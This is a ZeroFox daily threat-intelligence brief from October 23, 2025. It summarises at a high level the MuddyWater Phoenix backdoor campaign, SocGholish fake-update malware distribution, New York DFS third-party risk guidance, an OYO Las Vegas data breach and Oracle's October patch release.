ZeroFox Daily Intelligence Brief - October 23, 2025
|by Alpha Team
ZeroFox Daily Intelligence Brief - October 23, 2025
ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.
Brief Highlights
- Iran-Linked APT MuddyWater Deploying Phoenix Backdoor in New Campaign
- SocGholish Campaign Expands Global Malware Distribution
- DFS Issues Guidance on Third-Party Risk Management
Iran-Linked APT MuddyWater Deploying Phoenix Backdoor in New Campaign
Source: https://thehackernews.com/2025/10/iran-linked-muddywater-targets-100.html
What we know: Iran-linked advanced persistence threat (APT) group MuddyWater has targeted over 100 government entities across the Middle East and North Africa (MENA) region in a new attack campaign aimed to infiltrate diplomatic and other high-value organizations.
Context: The campaign leverages a compromised email account via a legitimate service, NordVPN. The attackers use malicious Word documents which prompt them to enable macros, following which a malicious Visual Basic for Application code is executed to deploy the Phoenix backdoor via a loader called FakeUpdate.
Analyst note: MuddyWater’s command and control server reportedly hosts remote monitoring and management tools and a custom browser credential stealer very likely indicating their use in the current campaign. The threat actor is likely to maintain persistence in compromised systems.
SocGholish Campaign Expands Global Malware Distribution
Source: https://hackread.com/socgholish-malware-compromised-sites-ransomware/
What we know: SocGholish, a Malware-as-a-Service (MaaS) platform run by threat group TA569, is reportedly being used globally to spread malware via fake software updates, enabling ransomware distribution, data theft, and network breaches.
Context: TA569 compromises legitimate websites, often WordPress-based, by injecting malicious scripts or using domain shadowing to make attacks appear trustworthy. Victims are tricked into downloading fake updates that install malware strains such as LockBit, RansomHub, and AsyncRAT.
Analyst note: As SocGholish continues to operate as a MaaS platform, more threat actors are likely to leverage it to deliver multiple ransomware to increasingly target government, healthcare, and other industries.
DFS Issues Guidance on Third-Party Risk Management
What we know: The New York State Department of Financial Services (DFS) has issued guidance on managing risks related to third-party service providers, requiring financial institutions to implement tighter governance, cybersecurity safeguards, and accountability measures across vendor relationships.
Context: The guidance follows a rise in third-party and supply chain cyber incidents, where vendors or outsourced providers became entry points for data breaches or system disruptions. DFS aims to ensure banks, insurers, and virtual currency firms maintain accountability even when outsourcing critical functions.
Analyst note: DFS recommends that companies map and categorize all third-party relationships, conduct risk-based cyber due diligence, continuously monitor vendors’ security posture, and include enforceable cybersecurity clauses in contracts. These measures will likely reduce possibilities of being targeted in data breaches, supply chain attacks, service disruptions, and compliance failures.
DEEP AND DARK WEB INTELLIGENCE
OYO Hotel & Casino Las Vegas breach: OYO Hotel & Casino located near the Las Vegas Strip on Tropical Avenue has suffered a data breach affecting a total of 4,741 people due to a cyber incident in January 2025. The operator of the casino, informed affected individuals that an unusual activity was detected in the hotel and casino’s shared network environment. Threat actors are likely to use exposed data to extort affected individuals using blackmail, phishing, or social engineering attacks.
VULNERABILITY AND EXPLOIT INTELLIGENCE
Oracle October 2025 security patches: Oracle has released 374 security patches across its product portfolio as part of the October 2025 Critical Patch Update (CPU). The company strongly urges customers to apply these patches without delay, especially on network-exposed systems, since several of the flaws could be exploited for remote code execution, data theft, or service disruption.
Affected products: The affected products are listed in this advisory.
Tags: DIB, tlp:green